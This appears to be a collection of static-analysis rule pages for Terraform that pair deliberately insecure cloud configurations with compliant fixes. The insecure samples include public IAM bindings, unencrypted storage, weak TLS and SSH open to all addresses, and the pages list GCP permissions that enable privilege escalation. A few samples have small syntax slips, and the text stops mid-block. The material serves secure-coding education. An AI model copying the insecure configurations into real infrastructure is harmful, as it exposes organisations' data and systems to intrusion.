Security incidents associated with misuse of public access include disruption of critical functions, data theft, and additional costs due to resource overload.

To be as prepared as possible in the event of a security incident, authentication combined with fine-grained permissions helps maintain the principle of defense in depth and trace incidents back to the perpetrators.

GCP also provides the ability to grant access to a large group of people:

  • If public access is granted to all Google users, the impact of a data theft is the same as if public access is granted to all Internet users.
  • If access is granted to a large Google group, the impact of a data theft is limited based on the size of the group.

The only thing that changes in these cases is the ability to track user access in the event of an incident.

Ask Yourself Whether

  • This GCP resource is essential to the information system infrastructure.
  • This GCP resource is essential to mission-critical functions.
  • This GCP resource stores or processes sensitive data.
  • Compliance policies require that access to this resource be authenticated.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Explicitly set access to this resource or function as private.

Sensitive Code Example

For IAM resources:

resource "google_cloudfunctions_function_iam_binding" "example" {
  members = [
    "allUsers",              # Sensitive
    "allAuthenticatedUsers", # Sensitive
  ]
}

resource "google_cloudfunctions_function_iam_member" "example" {
  member = "allAuthenticatedUsers" # Sensitive
}

For ACL resources:

resource "google_storage_bucket_access_control" "example" {
  entity = "allUsers" # Sensitive
}

resource "google_storage_bucket_acl" "example" {
  role_entity = [
    "READER:allUsers",              # Sensitive
    "READER:allAuthenticatedUsers", # Sensitive
  ]
}

For container clusters:

resource "google_container_cluster" "example" {
  private_cluster_config {
    enable_private_nodes    = false # Sensitive
    enable_private_endpoint = false # Sensitive
  }
}

Compliant Solution

For IAM resources:

resource "google_cloudfunctions_function_iam_binding" "example" {
  members = [
    "serviceAccount:${google_service_account.example.email}",
    "group:${var.example_group}"
  ]
}

resource "google_cloudfunctions_function_iam_member" "example" {
  member = "user:${var.example_user}" # Sensitive
}

For ACL resources:

resource "google_storage_bucket_access_control" "example" {
  entity = "user-${var.example_user]"
}

resource "google_storage_bucket_acl" "example" {
  role_entity = [
    "READER:user-name@example.com",
    "READER:group-admins@example.com"
  ]
}

For container clusters:

resource "google_container_cluster" "example" {
  private_cluster_config {
    enable_private_nodes    = true
    enable_private_endpoint = true
  }
}

See

terraform:S6327

Amazon Simple Notification Service (SNS) is a managed messaging service for application-to-application (A2A) and application-to-person (A2P) communication. SNS topics allows publisher systems to fanout messages to a large number of subscriber systems. Amazon SNS allows to encrypt messages when they are received. In the case that adversaries gain physical access to the storage medium or otherwise leak a message they are not able to access the data.

Ask Yourself Whether

  • The topic contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt SNS topics that contain sensitive information. Encryption and decryption are handled transparently by SNS, so no further modifications to the application are necessary.

Sensitive Code Example

For aws_sns_topic:

resource "aws_sns_topic" "topic" {  # Sensitive, encryption disabled by default
  name = "sns-unencrypted"
}

Compliant Solution

For aws_sns_topic:

resource "aws_sns_topic" "topic" {
  name = "sns-encrypted"
  kms_master_key_id = aws_kms_key.enc_key.key_id
}

See

terraform:S6403

By default, GCP SQL instances offer encryption in transit, with support for TLS, but insecure connections are still accepted. On an unsecured network, such as a public network, the risk of traffic being intercepted is high. When the data isn’t encrypted, an attacker can intercept it and read confidential information.

When creating a GCP SQL instance, a public IP address is automatically assigned to it and connections to the SQL instance from public networks can be authorized.

TLS is automatically used when connecting to SQL instances through:

Ask Yourself Whether

Connections are not already automatically encrypted by GCP (eg: SQL Auth proxy) and

  • Connections to the SQL instance are performed on untrusted networks.
  • The data stored in the SQL instance is confidential.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt all connections to the SQL instance, whether using public or private IP addresses. However, since private networks can be considered trusted, requiring TLS in this situation is usually a lower priority task.

Sensitive Code Example

resource "google_sql_database_instance" "example" { # Sensitive: tls is not required
  name             = "noncompliant-master-instance"
  database_version = "POSTGRES_11"
  region           = "us-central1"

  settings {
    tier = "db-f1-micro"
  }
}

Compliant Solution

resource "google_sql_database_instance" "example" {
  name             = "compliant-master-instance"
  database_version = "POSTGRES_11"
  region           = "us-central1"

  settings {
    tier = "db-f1-micro"
    ip_configuration {
      require_ssl = true
      ipv4_enabled = true
    }
  }
}

See

terraform:S4423

This vulnerability exposes encrypted data to a number of attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

For these reasons, as soon as cryptography is included in a project, it is important to choose encryption algorithms that are considered strong and secure by the cryptography community.

To provide communication security over a network, SSL and TLS are generally used. However, it is important to note that the following protocols are all considered weak by the cryptographic community, and are officially deprecated:

  • SSL versions 1.0, 2.0 and 3.0
  • TLS versions 1.0 and 1.1

When these unsecured protocols are used, it is best practice to expect a breach: that a user or organization with malicious intent will perform mathematical attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it on a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in AWS API Gateway

Code examples

These code samples illustrate how to fix this issue in both APIGateway and ApiGatewayV2.

Noncompliant code example

resource "aws_api_gateway_domain_name" "example" {
  domain_name = "api.example.com"
  security_policy = "TLS_1_0" # Noncompliant
}

The ApiGatewayV2 uses a weak TLS version by default:

resource "aws_apigatewayv2_domain_name" "example" {
  domain_name = "api.example.com"
  domain_name_configuration {} # Noncompliant
}

Compliant solution

resource "aws_api_gateway_domain_name" "example" {
  domain_name = "api.example.com"
  security_policy = "TLS_1_2"
}
resource "aws_apigatewayv2_domain_name" "example" {
  domain_name = "api.example.com"
  domain_name_configuration {
    security_policy = "TLS_1_2"
  }
}

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS V1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback depends on whether the framework used is outdated: its TLS v1.2 settings may enable older and insecure cipher suites that are deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

terraform:S6249

By default, S3 buckets can be accessed through HTTP and HTTPs protocols.

As HTTP is a clear-text protocol, it lacks the encryption of transported data, as well as the capability to build an authenticated connection. It means that a malicious actor who is able to intercept traffic from the network can read, modify or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to deny all HTTP requests:

  • for all objects (*) of the bucket
  • for all principals (*)
  • for all actions (*)

Sensitive Code Example

No secure policy is attached to this bucket:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
}

A policy is defined but forces only HTTPs communication for some users:

resource "aws_s3_bucket" "mynoncompliantbucket" { # Sensitive
  bucket = "mynoncompliantbucketname"
}

resource "aws_s3_bucket_policy" "mynoncompliantbucketpolicy" {
  bucket = "mynoncompliantbucketname"

  policy = jsonencode({
    Version = "2012-10-17"
    Id      = "mynoncompliantbucketpolicy"
    Statement = [
      {
        Sid       = "HTTPSOnly"
        Effect    = "Deny"
        Principal = [
          "arn:aws:iam::123456789123:root"
        ] # secondary location: only one principal is forced to use https
        Action    = "s3:*"
        Resource = [
          aws_s3_bucket.mynoncompliantbucketpolicy.arn,
          "${aws_s3_bucket.mynoncompliantbucketpolicy.arn}/*",
        ]
        Condition = {
          Bool = {
            "aws:SecureTransport" = "false"
          }
        }
      },
    ]
  })
}

Compliant Solution

A secure policy that denies all HTTP requests is used:

resource "aws_s3_bucket" "mycompliantbucket" {
  bucket = "mycompliantbucketname"
}

resource "aws_s3_bucket_policy" "mycompliantpolicy" {
  bucket = "mycompliantbucketname"

  policy = jsonencode({
    Version = "2012-10-17"
    Id      = "mycompliantpolicy"
    Statement = [
      {
        Sid       = "HTTPSOnly"
        Effect    = "Deny"
        Principal = "*"
        Action    = "s3:*"
        Resource = [
          aws_s3_bucket.mycompliantbucket.arn,
          "${aws_s3_bucket.mycompliantbucket.arn}/*",
        ]
        Condition = {
          Bool = {
            "aws:SecureTransport" = "false"
          }
        }
      },
    ]
  })
}

See

terraform:S6406

Excessive granting of GCP IAM permissions can allow attackers to exploit an organization’s cloud resources with malicious intent.

To prevent improper creation or deletion of resources after an account is compromised, proactive measures include both following GCP Security Insights and ensuring custom roles contain as few privileges as possible.

After gaining a foothold in the target infrastructure, sophisticated attacks typically consist of two major parts.
First, attackers must deploy new resources to carry out their malicious intent. To guard against this, operations teams must control what unexpectedly appears in the infrastructure, such as what is:

  • added
  • written down
  • updated
  • started
  • appended
  • applied
  • accessed.

Once the malicious intent is executed, attackers must avoid detection at all costs.
To counter attackers' attempts to remove their fingerprints, operations teams must control what unexpectedly disappears from the infrastructure, such as what is:

  • stopped
  • disabled
  • canceled
  • deleted
  • destroyed
  • detached
  • disconnected
  • suspended
  • rejected
  • removed.

For operations teams to be resilient in this scenario, their organization must apply both:

  • Detection security: log these actions to better detect malicious actions.
  • Preventive security: review and limit granted permissions.

This rule raises an issue when a custom role grants a number of sensitive permissions (read-write or destructive permission) that is greater than a given parameter.

Ask Yourself Whether

  • This custom role will be mostly used for read-only purposes.
  • Compliance policies require read-only access.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

To reduce the risks associated with this role after a compromise:

  • Reduce the list of permissions to grant only those that are actually needed.
  • Favor read-only over read-write.

Sensitive Code Example

This custom role grants more than 5 sensitive permissions:

resource "google_project_iam_custom_role" "example" {
  permissions = [ # Sensitive
    "resourcemanager.projects.create", # Sensitive permission
    "resourcemanager.projects.delete", # Sensitive permission
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create", # Sensitive permission
    "run.services.delete", # Sensitive permission
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.setIamPolicy",  # Sensitive permission
    "run.services.list",
    "run.services.update",  # Sensitive permission
  ]
}

Compliant Solution

This custom role grants less than 5 sensitive permissions:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

See

terraform:S6329

Enabling public network access to cloud resources can affect an organization’s ability to protect its data or internal operations from data theft or disruption.

Depending on the component, inbound access from the Internet can be enabled via:

  • a boolean value that explicitly allows access to the public network.
  • the assignment of a public IP address.
  • database firewall rules that allow public IP ranges.

Deciding to allow public access may happen for various reasons such as for quick maintenance, time saving, or by accident.

This decision increases the likelihood of attacks on the organization, such as:

  • data breaches.
  • intrusions into the infrastructure to permanently steal from it.
  • and various malicious traffic, such as DDoS attacks.

Ask Yourself Whether

This cloud resource:

  • should be publicly accessible to any Internet user.
  • requires inbound traffic from the Internet to function properly.

There is a risk if you answered no to any of those questions.

Recommended Secure Coding Practices

Avoid publishing cloud services on the Internet unless they are intended to be publicly accessible, such as customer portals or e-commerce sites.

Use private networks (and associated private IP addresses) and VPC peering or other secure communication tunnels to communicate with other cloud components.

The goal is to prevent the component from intercepting traffic coming in via the public IP address. If the cloud resource does not support the absence of a public IP address, assign a public IP address to it, but do not create listeners for the public IP address.

Sensitive Code Example

For AWS:

resource "aws_instance" "example" {
  associate_public_ip_address = true # Sensitive
}
resource "aws_dms_replication_instance" "example" {
  publicly_accessible = true # Sensitive
}

For Azure:

resource "azurerm_postgresql_server" "example"  {
  public_network_access_enabled = true # Sensitive
}
resource "azurerm_postgresql_server" "example"  {
  public_network_access_enabled = true # Sensitive
}
resource "azurerm_kubernetes_cluster" "production" {
  api_server_authorized_ip_ranges = ["176.0.0.0/4"] # Sensitive
  default_node_pool {
    enable_node_public_ip = true # Sensitive
  }
}

For GCP:

resource "google_compute_instance" "example" {
  network_interface {
    network = "default"

    access_config {  # Sensitive
      # Ephemeral public IP
    }
  }

Compliant Solution

For AWS:

resource "aws_instance" "example" {
  associate_public_ip_address = false
}
resource "aws_dms_replication_instance" "example" {
  publicly_accessible          = false
}

For Azure:

resource "azurerm_postgresql_server" "example"  {
  public_network_access_enabled = false
}
resource "azurerm_kubernetes_cluster" "production" {
  api_server_authorized_ip_ranges = ["192.168.0.0/16"]
  default_node_pool {
    enable_node_public_ip = false
  }
}

For GCP:

resource "google_compute_instance" "example" {
  network_interface {
    network = google_compute_network.vpc_network_example.name
  }
}

Note that setting network="default" in the network interface block leads to other security problems such as removal of logging, Cloud VPN/VPC network peering, and the addition of insecure firewall rules.
A safer alternative includes creating a specific VPC or subnetwork and enforce security measures.

See

terraform:S6405

SSH keys stored and managed in a project’s metadata can be used to access GCP VM instances. By default, GCP automatically deploys project-level SSH keys to VM instances.

Project-level SSH keys can lead to unauthorized access because:

  • Their use prevents fine-grained VM-level access control and makes it difficult to follow the principle of least privilege.
  • Unlike managed access control with OS Login, manual cryptographic key management is error-prone and requires careful attention. For example, if a user leaves a project, their SSH keys should be removed from the metadata to prevent unwanted access.
  • If a project-level SSH key is compromised, all VM instances may be compromised.

Ask Yourself Whether

  • VM instances in a project have different security requirements.
  • Many users with different profiles need access to the VM instances in that project.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Block project-level SSH keys by setting the metadata.block-project-ssh-keys argument to true
  • Use OSLogin to benefit from managed access control.

Sensitive Code Example

resource "google_compute_instance" "example" { # Sensitive, because metadata.block-project-ssh-keys is not set to true
  name         = "example"
  machine_type = "e2-micro"
  zone         = "us-central1-a"

  network_interface {
    network = "default"

    access_config {
    }
  }
}

Compliant Solution

resource "google_compute_instance" "example" {
  name         = "example"
  machine_type = "e2-micro"
  zone         = "us-central1-a"

  metadata = {
    block-project-ssh-keys = true
  }

  network_interface {
    network = "default"

    access_config {
    }
  }
}

See

terraform:S6400

Granting highly privileged resource rights to users or groups can reduce an organization’s ability to protect against account or service theft. It prevents proper segregation of duties and creates potentially critical attack vectors on affected resources.

If elevated access rights are abused or compromised, both the data that the affected resources work with and their access tracking are at risk.

Ask Yourself Whether

  • This GCP resource is essential to the information system infrastructure.
  • This GCP resource is essential to mission-critical functions.
  • Compliance policies require that administrative privileges for this resource be limited to a small group of individuals.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Grant IAM policies or members a less permissive role: In most cases, granting them read-only privileges is sufficient.

Separate tasks by creating multiple roles that do not use a full access role for day-to-day work.

If the predefined GCP roles do not include the specific permissions you need, create custom IAM roles.

Sensitive Code Example

For an IAM policy setup:

data "google_iam_policy" "admin" {
  binding {
    role = "roles/run.admin" # Sensitive
    members = [
      "user:name@example.com",
    ]
  }
}

resource "google_cloud_run_service_iam_policy" "policy" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  policy_data = data.google_iam_policy.admin.policy_data
}

For an IAM policy binding:

resource "google_cloud_run_service_iam_binding" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/run.admin" # Sensitive
  members = [
    "user:name@example.com",
  ]
}

For adding a member to a policy:

resource "google_cloud_run_service_iam_member" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/run.admin" # Sensitive
  member = "user:name@example.com"
}

Compliant Solution

For an IAM policy setup:

data "google_iam_policy" "admin" {
  binding {
    role = "roles/viewer"
    members = [
      "user:name@example.com",
    ]
  }
}

resource "google_cloud_run_service_iam_policy" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  policy_data = data.google_iam_policy.admin.policy_data
}

For an IAM policy binding:

resource "google_cloud_run_service_iam_binding" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/viewer"
  members = [
    "user:name@example.com",
  ]
}

For adding a member to a policy:

resource "google_cloud_run_service_iam_member" "example" {
  location = google_cloud_run_service.default.location
  project = google_cloud_run_service.default.project
  service = google_cloud_run_service.default.name
  role = "roles/viewer"
  member = "user:name@example.com"
}

See

terraform:S6245

Server-side encryption (SSE) encrypts an object (not the metadata) as it is written to disk (where the S3 bucket resides) and decrypts it as it is read from disk. This doesn’t change the way the objects are accessed, as long as the user has the necessary permissions, objects are retrieved as if they were unencrypted. Thus, SSE only helps in the event of disk thefts, improper disposals of disks and other attacks on the AWS infrastructure itself.

There are three SSE options:

  • Server-Side Encryption with Amazon S3-Managed Keys (SSE-S3)
    • AWS manages encryption keys and the encryption itself (with AES-256) on its own.
  • Server-Side Encryption with Customer Master Keys (CMKs) Stored in AWS Key Management Service (SSE-KMS)
    • AWS manages the encryption (AES-256) of objects and encryption keys provided by the AWS KMS service.
  • Server-Side Encryption with Customer-Provided Keys (SSE-C)
    • AWS manages only the encryption (AES-256) of objects with encryption keys provided by the customer. AWS doesn’t store the customer’s encryption keys.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure needs to comply to some regulations, like HIPAA or PCI DSS, and other standards.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to use SSE. Choosing the appropriate option depends on the level of control required for the management of encryption keys.

Sensitive Code Example

Server-side encryption is not used:

resource "aws_s3_bucket" "example" { # Sensitive
  bucket = "example"
}

Compliant Solution

Server-side encryption with Amazon S3-managed keys is used for AWS provider version 3 or below:

resource "aws_s3_bucket" "example" {
  bucket = "example"

  server_side_encryption_configuration {
    rule {
      apply_server_side_encryption_by_default {
        sse_algorithm = "AES256"
      }
    }
  }
}

Server-side encryption with Amazon S3-managed keys is used for AWS provider version 4 or above:

resource "aws_s3_bucket" "example" {
  bucket = "example"
}

resource "aws_s3_bucket_server_side_encryption_configuration" "example" {
  bucket = aws_s3_bucket.example.bucket

  rule {
    apply_server_side_encryption_by_default {
      sse_algorithm = "AES256"
    }
  }
}

See

terraform:S6402

Domain Name Systems (DNS) are vulnerable by default to various types of attacks.

One of the biggest risks is DNS cache poisoning, which occurs when a DNS accepts spoofed DNS data, caches the malicious records, and potentially sends them later in response to legitimate DNS request lookups. This attack typically relies on the attacker’s MITM ability on the network and can be used to redirect users from an intended website to a malicious website.

To prevent these vulnerabilities, Domain Name System Security Extensions (DNSSEC) ensure the integrity and authenticity of DNS data by digitally signing DNS zones.

The public key of a DNS zone used to validate signatures can be trusted as DNSSEC is based on the following chain of trust:

  • The parent DNS zone adds a "fingerprint" of the public key of the child zone in a "DS record".
  • The parent DNS zone signs it with its own private key.
  • And this process continues until the root zone.

Ask Yourself Whether

The parent DNS zone (likely managed by the DNS registrar of the domain name) supports DNSSEC and

  • The DNS zone is public (contains data such as public reachable IP addresses).

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to use DNSSEC when creating private and public DNS zones.

Private DNS zones cannot be queried on the Internet and provide DNS name resolution for private networks. The risk of MITM attacks might be considered low on these networks and therefore implementing DNSSEC is still recommended but not with a high priority.

Note: Choose a robust signing algorithm when setting up DNSSEC, such as rsasha256. The insecure rsasha1 algorithm should no longer be used.

Sensitive Code Example

resource "google_dns_managed_zone" "example" { # Sensitive: dnssec_config is missing
  name     = "foobar"
  dns_name = "foo.bar."
}

Compliant Solution

resource "google_dns_managed_zone" "example" {
  name     = "foobar"
  dns_name = "foo.bar."

  dnssec_config {
    default_key_specs {
      algorithm = "rsasha256"
    }
  }
}

See

terraform:S6401

The likelihood of security incidents increases when cryptographic keys are used for a long time. Thus, to strengthen the data protection it’s recommended to rotate the symmetric keys created with the Google Cloud Key Management Service (KMS) automatically and periodically. Note that it’s not possible in GCP KMS to rotate asymmetric keys automatically.

Ask Yourself Whether

  • The cryptographic key is a symmetric key.
  • The application requires compliance with some security standards like PCI-DSS.

Recommended Secure Coding Practices

It’s recommended to rotate keys automatically and regularly. The shorter the key period, the less data can be decrypted by an attacker if a key is compromised. So the key rotation period usually depends on the amount of data encrypted with a key or other requirements such as compliance with security standards. In general, a period of time of 90 days can be used.

Sensitive Code Example

resource "google_kms_crypto_key" "noncompliant-key" { # Sensitive: no rotation period is defined
  name            = "example"
  key_ring        = google_kms_key_ring.keyring.id
}

Compliant Solution

resource "google_kms_crypto_key" "compliant-key" {
  name            = "example"
  key_ring        = google_kms_key_ring.keyring.id
  rotation_period = "7776000s" # 90 days
}

See

terraform:S6408

Creating custom roles that allow privilege escalation can allow attackers to maliciously exploit an organization’s cloud resources.

Certain GCP permissions allow impersonation of one or more privileged principals within a GCP infrastructure.
To prevent privilege escalation after an account has been compromised, proactively follow GCP Security Insights and ensure that custom roles contain as few privileges as possible that allow direct or indirect impersonation.

For example, privileges like deploymentmanager.deployments.create allow impersonation of service accounts, even if the name does not sound like it.
Other privileges like setIamPolicy, which are more explicit, directly allow their holder to extend their privileges.

After gaining a foothold in the target infrastructure, sophisticated attackers typically map their newfound roles to understand what is exploitable.

The riskiest privileges are either:

  • At the infrastructure level: privileges to perform project, folder, or organization-wide administrative tasks.
  • At the resource level: privileges to perform resource-wide administrative tasks.

In either case, the following privileges should be avoided or granted only with caution:

  • ..setIamPolicy
  • cloudbuilds.builds.create
  • cloudfunctions.functions.create
  • cloudfunctions.functions.update
  • cloudscheduler.jobs.create
  • composer.environments.create
  • compute.instances.create
  • dataflow.jobs.create
  • dataproc.clusters.create
  • deploymentmanager.deployments.create
  • iam.roles.update
  • iam.serviceAccountKeys.create
  • iam.serviceAccounts.actAs
  • iam.serviceAccounts.getAccessToken
  • iam.serviceAccounts.getOpenIdToken
  • iam.serviceAccounts.implicitDelegation
  • iam.serviceAccounts.signBlob
  • iam.serviceAccounts.signJwt
  • orgpolicy.policy.set
  • run.services.create
  • serviceusage.apiKeys.create
  • serviceusage.apiKeys.list
  • storage.hmacKeys.create

Ask Yourself Whether

  • This role requires impersonation to perform specific tasks with different privileges.
  • This custom role is intended for a small group of administrators.

There is a risk if you answered no to these questions.

Recommended Secure Coding Practices

Use a permission that does not allow privilege escalation.

Sensitive Code Example

Lightweight custom role intended for a developer:

resource "google_organization_iam_custom_role" "example" {
  permissions = [
    "iam.serviceAccounts.getAccessToken",     # Sensitive
    "iam.serviceAccounts.getOpenIdToken",     # Sensitive
    "iam.serviceAccounts.actAs",              # Sensitive
    "iam.serviceAccounts.implicitDelegation", # Sensitive
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

Lightweight custom role intended for a read-only user:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "iam.serviceAccountKeys.create",        # Sensitive
    "iam.serviceAccountKeys.get",           # Sensitive
    "deploymentmanager.deployments.create", # Sensitive
    "cloudbuild.builds.create",             # Sensitive
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
  ]
}

Compliant Solution

Lightweight custom role intended for a developer:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.create",
    "run.services.delete",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
    "run.services.update",
  ]
}

Lightweight custom role intended for a read-only user:

resource "google_project_iam_custom_role" "example" {
  permissions = [
    "resourcemanager.projects.get",
    "resourcemanager.projects.list",
    "run.services.get",
    "run.services.getIamPolicy",
    "run.services.list",
  ]
}

See

terraform:S6407

App Engine supports encryption in transit through TLS. As soon as the app is deployed, it can be requested using appspot.com domains or custom domains. By default, endpoints accept both clear-text and encrypted traffic. When communication isn’t encrypted, there is a risk that an attacker could intercept it and read confidential information.

When creating an App Engine, request handlers can be set with different security level for encryption:

  • SECURE_NEVER: only HTTP requests are allowed (HTTPS requests are redirected to HTTP).
  • SECURE_OPTIONAL and SECURE_DEFAULT: both HTTP and HTTPS requests are allowed.
  • SECURE_ALWAYS: only HTTPS requests are allowed (HTTP requests are redirected to HTTPS).

Ask Yourself Whether

  • The handler serves confidential data in HTTP responses.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended for App Engine handlers to require TLS for all traffic. It can be achieved by setting the security level to SECURE_ALWAYS.

Sensitive Code Example

SECURE_DEFAULT, SECURE_NEVER and SECURE_OPTIONAL are sensitive TLS security level:

resource "google_app_engine_standard_app_version" "example" {
  version_id = "v1"
  service    = "default"
  runtime    = "nodejs"

  handlers {
    url_regex                   = ".*"
    redirect_http_response_code = "REDIRECT_HTTP_RESPONSE_CODE_301"
    security_level              = "SECURE_OPTIONAL" # Sensitive
    script {
      script_path = "auto"
    }
  }
}

Compliant Solution

Force the use of TLS for the handler by setting the security level on SECURE_ALWAYS:

resource "google_app_engine_standard_app_version" "example" {
  version_id = "v1"
  service    = "default"
  runtime    = "nodejs"

  handlers {
    url_regex                   = ".*"
    redirect_http_response_code = "REDIRECT_HTTP_RESPONSE_CODE_301"
    security_level              = "SECURE_ALWAYS"
    script {
      script_path = "auto"
    }
  }
}

See

terraform:S6409

Enabling Legacy Authorization, Attribute-Based Access Control (ABAC), on Google Kubernetes Engine resources can reduce an organization’s ability to protect itself against access controls being compromised.

For Kubernetes, Attribute-Based Access Control has been superseded by Role-Based Access Control. ABAC is not under active development anymore and thus should be avoided.

Ask Yourself Whether

  • This resource is essential for the information system infrastructure.
  • This resource is essential for mission-critical functions.
  • Compliance policies require access to this resource to be enforced through the use of Role-Based Access Control.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Unless you are relying on ABAC, leave it disabled.

Sensitive Code Example

For Google Kubernetes Engine:

resource "google_container_cluster" "example" {
  enable_legacy_abac = true # Sensitive
}

Compliant Solution

For Google Kubernetes Engine:

resource "google_container_cluster" "example" {
  enable_legacy_abac = false
}

See

terraform:S6321

Why is this an issue?

Cloud platforms such as AWS, Azure, or GCP support virtual firewalls that can be used to restrict access to services by controlling inbound and outbound traffic.
Any firewall rule allowing traffic from all IP addresses to standard network ports on which administration services traditionally listen, such as 22 for SSH, can expose these services to exploits and unauthorized access.

What is the potential impact?

Like any other service, administration services can contain vulnerabilities. Administration services run with elevated privileges and thus a vulnerability could have a high impact on the system.

Additionally, credentials might be leaked through phishing or similar techniques. Attackers who are able to reach the services could use the credentials to log in to the system.

How to fix it

It is recommended to restrict access to remote administration services to only trusted IP addresses. In practice, trusted IP addresses are those held by system administrators or those of bastion-like servers.

Code examples

Noncompliant code example

An ingress rule allowing all inbound SSH traffic for AWS:

resource "aws_security_group" "noncompliant" {
  name        = "allow_ssh_noncompliant"
  description = "allow_ssh_noncompliant"
  vpc_id      = aws_vpc.main.id

  ingress {
    description      = "SSH rule"
    from_port        = 22
    to_port          = 22
    protocol         = "tcp"
    cidr_blocks      = ["0.0.0.0/0"]  # Noncompliant
  }
}

A security rule allowing all inbound SSH traffic for Azure:

resource "azurerm_network_security_rule" "noncompliant" {
  priority                    = 100
  direction                   = "Inbound"
  access                      = "Allow"
  protocol                    = "Tcp"
  source_port_range           = "*"
  destination_port_range      = "22"
  source_address_prefix       = "*"  # Noncompliant
  destination_address_prefix  = "*"
}

A firewall rule allowing all inbound SSH traffic for GCP:

resource "google_compute_firewall" "noncompliant" {
  network = google_compute_network.default.name

  allow {
    protocol = "tcp"
    ports    = ["22"]
  }

  source_ranges = ["0.0.0.0/0"]  # Noncompliant
}

A security rule allowing all inbound SSH traffic for Azure:

resource "azurerm_network_security_rule" "noncompliant" {
  priority                    = 100
  direction                   = "Inbound"
  access                      = "Allow"
  protocol                    = "Tcp"
  source_port_range           = "*"
  destination_port_range      = "22"
  source_address_prefix       = "*"  # Noncompliant
  destination_address_prefix  = "*"
}

Compliant solution

An ingress rule allowing inbound SSH traffic from specific IP addresses for AWS:

resource "aws_security_group" "compliant" {
  name        = "allow_ssh_compliant"
  description = "allow_ssh_compliant"
  vpc_id      = aws_vpc.main.id

  ingress {
    description      = "SSH rule"
    from_port        = 22
    to_port          = 22
    protocol         = "tcp"
    cidr_blocks      = ["1.2.3.0/24"]
  }
}

A security rule allowing inbound SSH traffic from specific IP addresses for Azure:

resource "azurerm_network_security_rule" "compliant" {
  priority                    = 100
  direction                   = "Inbound"
  access                      = "Allow"
  protocol                    = "Tcp"
  source_port_range           = "*"
  destination_port_range      = "22"
  source_address_prefix       = "1.2.3.0"
  destination_address_prefix  = "*"
}

A firewall rule allowing inbound SSH traffic from specific IP addresses for GCP:

resource "google_compute_firewall" "compliant" {
  network = google_compute_network.default.name

  allow {
    protocol = "tcp"
